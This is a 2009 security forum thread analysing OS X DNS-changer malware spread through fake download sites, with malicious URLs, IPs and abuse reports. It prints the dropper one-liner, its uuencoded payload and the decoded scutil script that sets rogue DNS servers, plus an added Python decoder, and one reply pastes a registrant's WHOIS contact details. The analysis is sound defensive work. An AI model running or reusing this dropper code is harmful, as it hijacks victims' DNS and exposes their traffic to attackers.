Author Topic: MarcusB - OS X DNS Changer Thread  (Read 8829 times)

July 02, 2009, 04:56:14 pm

MarcusB (Guest)
domain name registrar has disabled...
music-megaupload.com
hot-exe-area.net
securerealy.com
Please help clean the interwebs!!! If you find a site that hosts malicious code, report the abuse to the registrar of the domain so they can DISABLE the site. This way the domain in question can't be used again for spreading malware!


http:/ /music-megaupload.com/2009/05/25/tupac-all-eyez-on-me-1996.html

music-megaupload.com
213.155.3.240 - 213.155.3.247
XeonN2
213.155.3.242

Clicking a download link for example...
http:/ /music-megaupload.com/wp-download.php?name=Tupac%20-%20All%20Eyez%20On%20Me%20(1996)&s=mumu&p=Music

redirects you to
http:/ /securerealy.com/download/5761384b73513d3d5da244ae20090701/Tupac.-.All.Eyez.On.Me.(1996).exe
if a Windows user agent, or
http:/ /securerealy.com/download/5761384b73513d3d5da244ae20090701/Tupac.-.All.Eyez.On.Me.(1996).dmg
if an OS X user agent.


securerealy.com
213.163.66.128 - 213.163.66.255
INTERACTIVE3D
213.163.66.241

Abuse report sent to registrar PUBLICDOMAINREGISTRY on domain 'music-megaupload.com'
Abuse report sent to registrar Enom inc. on domain 'securerealy.com'


------------------------------------------------------------------
Here is another similar domain to 'music-megaupload.com'
http:/ /free-full.com/2009/2pac-all-eyez-on-me-rapidshare.html

free-full.com
213.155.3.128 - 213.155.3.253
XeonN2
213.155.3.240

Earlier in the day, clicking the download links I got redirected to
http:/ /hot-exe-area.net/2Pac.-.All.Eyez.On.Me.45026.exe
The file is not malicious for the time being.
Current download links redirect to Google searches.

hot-exe-area.net
64.20.32.0 - 64.20.63.255
Interserver, Inc
64.20.38.172

However, doing a Google search for 'hot-exe-area.net', I found two links that are indeed malicious
http:/ /hot-exe-area.net/streamviewer.40019.exe
http://www.virustotal.com/analisis/ff7ddc5e00889455558c3ed5bb341de35f6466f454431554424a644da1d69bc1-1246552458
http:/ /hot-exe-area.net/video.123456789.exe
http://www.virustotal.com/analisis/3a225464bfe52066ccb82eea39d738ce37e48d7dcd851579c11dfc1cf0ec399e-1246552566

Abuse report sent to registrar PUBLICDOMAINREGISTRY of domain 'hot-exe-area.net'

-------------------------------------------------------------

The OSX version of the malware will connect to
213.163.66.242
213.163.66.128 - 213.163.66.255
INTERACTIVE3D

It downloads a shell script. The one-liner is the whole dropper; the eleven lines that follow it are the uuencoded payload that `tail -11 $0` reads back out of the file (comments added for each stage of the pipeline):

# tail -11 $0            : read the 11 uuencoded lines appended below this line
# uudecode -o /dev/stdout: decode them to a shell script on stdout
# sed 's/TEERTS/.../'    : replace the placeholder TEERTS with the first DNS server,
#                          hidden as "ml.pll.oop.ook" and decoded with tr (iopjklbnmv -> 0123456789)
# sed 's/CIGAM/.../'     : same for the second server, hidden as "ml.pll.oop.mn"
# sh && rm $0 && exit    : run the decoded script, then delete this file
tail -11 $0 | uudecode -o /dev/stdout | sed 's/TEERTS/'`echo ml.pll.oop.ook | tr iopjklbnmv 0123456789`'/' | sed 's/CIGAM/'`echo ml.pll.oop.mn | tr iopjklbnmv 0123456789`'/'| sh && rm $0 && exit
begin 777 mac
M(R$O8FEN+W-H"G!A=&@](B],:6)R87)Y+TEN=&5R;F5T(%!L=6<M26YS(@H*
M5E@Q/2)414525%,B"E98,CTB0TE'04TB"@I04TE$/20H("@O=7-R+W-B:6XO
M<V-U=&EL('P@9W)E<"!0<FEM87)Y4V5R=FEC92!\('-E9"`M92`G<R\N*E!R
M:6UA<GE397)V:6-E(#H@+R\G*3P\($5/1@IO<&5N"F=E="!3=&%T93HO3F5T
M=V]R:R]';&]B86PO25!V-`ID+G-H;W<*<75I=`I%3T8**0H*+W5S<B]S8FEN
M+W-C=71I;"`\/"!%3T8*;W!E;@ID+FEN:70*9"YA9&0@4V5R=F5R061D<F5S
M<V5S("H@)%98,2`D5E@R"G-E="!3=&%T93HO3F5T=V]R:R]397)V:6-E+R10
14TE$+T1.4PIQ=6ET"D5/1@H`
`
end

The script will try to change the DNS servers to
85.255.112.114
85.255.112.87
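Putting the dropper's stages together in one script, as an added example that is not part of the original post or of the malware itself: it uudecodes the payload quoted above with Python's binascii, applies the same tr-style substitution the one-liner uses to turn ml.pll.oop.ook and ml.pll.oop.mn into dotted quads, pulls the resolver list out of the decoded scutil script (the same script shown decoded in Reply #2), and checks a list of configured resolvers against it. The uuencoded blob is copied verbatim from the post; the resolver list handed to find_rogue is a constructed sample, since on a real Mac it would come from `scutil --dns` or `networksetup -getdnsservers <service>`.

```python
import binascii
import re

# The uuencoded payload exactly as posted (the 8 data lines between
# "begin 777 mac" and "end"), embedded so the example runs offline.
UU_PAYLOAD = r"""
M(R$O8FEN+W-H"G!A=&@](B],:6)R87)Y+TEN=&5R;F5T(%!L=6<M26YS(@H*
M5E@Q/2)414525%,B"E98,CTB0TE'04TB"@I04TE$/20H("@O=7-R+W-B:6XO
M<V-U=&EL('P@9W)E<"!0<FEM87)Y4V5R=FEC92!\('-E9"`M92`G<R\N*E!R
M:6UA<GE397)V:6-E(#H@+R\G*3P\($5/1@IO<&5N"F=E="!3=&%T93HO3F5T
M=V]R:R]';&]B86PO25!V-`ID+G-H;W<*<75I=`I%3T8**0H*+W5S<B]S8FEN
M+W-C=71I;"`\/"!%3T8*;W!E;@ID+FEN:70*9"YA9&0@4V5R=F5R061D<F5S
M<V5S("H@)%98,2`D5E@R"G-E="!3=&%T93HO3F5T=V]R:R]397)V:6-E+R10
14TE$+T1.4PIQ=6ET"D5/1@H`
"""

# The dropper hides each octet as letters and recovers them with
# `tr iopjklbnmv 0123456789`: i->0, o->1, p->2, j->3, k->4, l->5, b->6, n->7, m->8, v->9.
TR_TABLE = str.maketrans("iopjklbnmv", "0123456789")


def decode_ip(token):
    """Reproduce the tr-based decoding of a dotted quad hidden as letters."""
    return token.translate(TR_TABLE)


def uudecode_lines(blob):
    """Decode the data lines of a uuencoded block (no begin/end lines)."""
    out = bytearray()
    for line in blob.splitlines():
        line = line.rstrip("\r\n")
        if not line or line == "`":   # blank or the zero-length terminator line
            continue
        out += binascii.a2b_uu(line.encode("ascii"))
    return bytes(out)


def deobfuscate(blob):
    """Mirror the one-liner: uudecode, then substitute the two placeholders.
    sed replaces the first match per line; str.replace replaces all, which is
    the same here because each placeholder appears exactly once."""
    script = uudecode_lines(blob).decode("ascii")
    script = script.replace("TEERTS", decode_ip("ml.pll.oop.ook"))
    script = script.replace("CIGAM", decode_ip("ml.pll.oop.mn"))
    return script


def extract_dns_servers(script):
    """Pull the resolver list from the `d.add ServerAddresses * ...` line,
    expanding $VARs that the script assigned earlier as VAR="value"."""
    assigns = dict(re.findall(r'^(\w+)="([^"]*)"\s*$', script, re.M))
    m = re.search(r'^d\.add ServerAddresses \* (.+)$', script, re.M)
    if not m:
        return []
    servers = []
    for tok in m.group(1).split():
        if tok.startswith("$"):
            tok = assigns.get(tok[1:], tok)
        servers.append(tok)
    return servers


def find_rogue(configured, rogue):
    """Return the configured resolvers that match the rogue set."""
    return [s for s in configured if s in rogue]


if __name__ == "__main__":
    script = deobfuscate(UU_PAYLOAD)
    print(script)
    rogue = set(extract_dns_servers(script))
    print("rogue resolvers:", sorted(rogue))
    # Constructed sample resolver list, as if read from a hijacked Mac.
    sample = ["85.255.112.114", "85.255.112.87", "8.8.8.8"]
    print("hits:", find_rogue(sample, rogue))
```

The extraction step is deliberately generic: it resolves whatever variables the decoded script assigns rather than hard-coding VX1/VX2, so it would still work if a later variant of the payload renamed them.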

July 02, 2009, 05:26:09 pm
Reply #1

bobby (Special Member, Hero Member)
M(R$O8FEN+W-H"G!A=&@](B],:6)R87)Y+TEN=&5R;F5T(%!L=6<M26YS(@H*
M5E@Q/2)414525%,B"E98,CTB0TE'04TB"@I04TE$/20H("@O=7-R+W-B:6XO
M<V-U=&EL('P@9W)E<"!0<FEM87)Y4V5R=FEC92!\('-E9"`M92`G<R\N*E!R
M:6UA<GE397)V:6-E(#H@+R\G*3P\($5/1@IO<&5N"F=E="!3=&%T93HO3F5T
M=V]R:R]';&]B86PO25!V-`ID+G-H;W<*<75I=`I%3T8**0H*+W5S<B]S8FEN
M+W-C=71I;"`\/"!%3T8*;W!E;@ID+FEN:70*9"YA9&0@4V5R=F5R061D<F5S
M<V5S("H@)%98,2`D5E@R"G-E="!3=&%T93HO3F5T=V]R:R]397)V:6-E+R10
14TE$+T1.4PIQ=6ET"D5/1@H`
`
Decodes to:
#!/bin/sh
path="/Library/Internet Plug-Ins"

July 02, 2009, 05:55:35 pm
Reply #2

MarcusB (Guest)
It does?

This is what I get when decoding...


#!/bin/sh
path="/Library/Internet Plug-Ins"   # assigned but never used by the script

# The rogue resolvers (the dropper's sed put these in place of TEERTS and CIGAM)
VX1="85.255.112.114"
VX2="85.255.112.87"

# Ask the system configuration dynamic store for the ID of the primary network service
PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')<< EOF
open
get State:/Network/Global/IPv4
d.show
quit
EOF
)

# Overwrite that service's DNS entry with the two rogue resolvers
/usr/sbin/scutil << EOF
open
d.init
d.add ServerAddresses * $VX1 $VX2
set State:/Network/Service/$PSID/DNS
quit
EOF

July 03, 2009, 02:15:28 am
Reply #3

MarcusB (Guest)
domain name registrar has disabled...
let-exe-2009.com
av-scan-cool.com
Please help clean the interwebs!!! If you find a site that hosts malicious code, report the abuse to the registrar of the domain so they can DISABLE the site. This way the domain in question can't be used again for spreading malware!



Followed in order...
http:/ /members.lycos.nl/kolbi44/
http:/ /speed-tube.net/tds/go.php?sid=3
http:/ /video-tube.cn/tds3/in.cgi?5

http:/ /hotxxxtubz.com/123/mac3/FFFFFF/57506e7336413d3dc340d7e120090615/TestCodec/BestPorn/
http:/ /selectaaron.com/download/57506e7336413d3dc340d7e120090615/TestCodec.dmg
http:/ /selectaaron.com/download/57506e7336413d3dc340d7e120090615/TestCodec.exe


These two sites...
http:/ /speed-tube.net/tds/go.php?sid=3
http:/ /video-tube.cn/tds3/in.cgi?5
also redirected me to these sites...

http:/ /av-scan-cool.com/?id=45095
http:/ /let-exe-2009.com/av-scanner.45095.exe


members.lycos.nl - 213.131.252.251
speed-tube.net - 70.84.196.26 - ThePlanet.com Internet Services, Inc.
video-tube.cn - 70.84.196.30 - ThePlanet.com Internet Services, Inc.
hotxxxtubz.com - 93.190.140.56 - WORLDSTREAM
selectaaron.com - 213.163.66.241 - INTERACTIVE3D
av-scan-cool.com - 216.240.143.8 - ATMLINK, INC.
let-exe-2009.com - 64.20.38.172 - Interserver, Inc


Abuse report sent to registrar PUBLICDOMAINREGISTRY on domain 'av-scan-cool.com'
Abuse report sent to registrar PUBLICDOMAINREGISTRY on domain 'let-exe-2009.com'
Abuse report sent to registrar Enom inc. on domain 'selectaaron.com'


Some other sites I have been redirected to by the first three links listed but have yet to check out...
http:/ /totalsecuritysite.com/hitin.php?land=30&affid=21700
http:/ /totalsecuritysite.com/scan.php?affid=21700
http:/ /softwaredownloadcodec.cn/tds3/in.cgi?3
http:/ /www.topadult10.com/search.php?aid=59426&q=adult+dating
http:/ /muvieportal2008.cn/tds3/in.cgi?3
http:/ /findergall.net/tds3/default.cgi

July 05, 2009, 02:37:42 pm
Reply #4

djlheat (Newbie)
I got a virus from this jerk that I can't get rid of, and I don't know how to contact the provider to complain. He gave me a trojan:
    * File MD5: 0x74441056E4BA6F3BE0B4B9CC36991960
    * File SHA-1: 0xA4DB80AB2E3F61715181CB97FB030B1238BBB1C1
    * Filesize: 108,530 bytes
    * Alias:
          o Trojan-GameThief.Win32.Magania.bjdx [Kaspersky Lab]
          o Mal/Frethog-B [Sophos]
          o Worm.Win32.Taterf [Ikarus]
          o Win-Trojan/OnlineGameHack.108530 [AhnLab]


this is his info:

Domain Name      : 35465543.com
PunnyCode        : 35465543.COM


Registrant:
  Organization   : huang
  Name           : huang
  Address        : xiamen
  City           : xiamenshi
  Province/State : fujiansheng
  Country        : china
  Postal Code    : 100000

Administrative Contact:
  Name           : huang
  Organization   : huang
  Address        : xiamen
  City           : xiamenshi
  Province/State : fujiansheng
  Country        : china
  Postal Code    : 100000
  Phone Number   : 0-139-139346566
  Fax            : 0-139-13934656
  Email          : fenfenaidajian@21cn.com

Technical Contact:
  Name           : huang
  Organization   : huang
  Address        : xiamen
  City           : xiamenshi
  Province/State : fujiansheng
  Country        : china
  Postal Code    : 100000
  Phone Number   : 0-139-139346566
  Fax            : 0-139-13934656
  Email          : fenfenaidajian@21cn.com

Billing Contact:
  Name           : huang
  Organization   : huang
  Address        : xiamen
  City           : xiamenshi
  Province/State : fujiansheng
  Country        : china
  Postal Code    : 100000
  Phone Number   : 0-139-139346566
  Fax            : 0-139-13934656
  Email          : fenfenaidajian@21cn.com

July 05, 2009, 05:11:13 pm
Reply #5

MysteryFCM (Administrator, Hero Member)
Reporting it to the hosting company is a waste of time as they're crimeware friendly.

With regards to the infection, please refer to the following if you still need help with this;

http://temerc.com/forums/viewtopic.php?f=12&t=18
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 22, 2009, 12:34:45 am
Reply #6

MarcusB (Guest)
Click on the download link
http:/ /yourcrackkey.com/mac-os-x-leopard-1054-for-amd-intel.html
213.182.197.8

The download link takes you to
http:/ /bigdron.com/download/4b71774f58773d3d463c9eb920090715/keygen-mac_os_x_leopard_10_5_4_for_amd_&_intel.dmg
91.214.45.73

Running the executable, it tries to download additional code from the IP
91.214.45.74

July 22, 2009, 02:47:12 pm
Reply #7

MarcusB (Guest)
http:/ /civilizxx.com/download/734d327771673d3d720ba09a20090715/AdobeFlashPlayer.dmg
91.214.45.73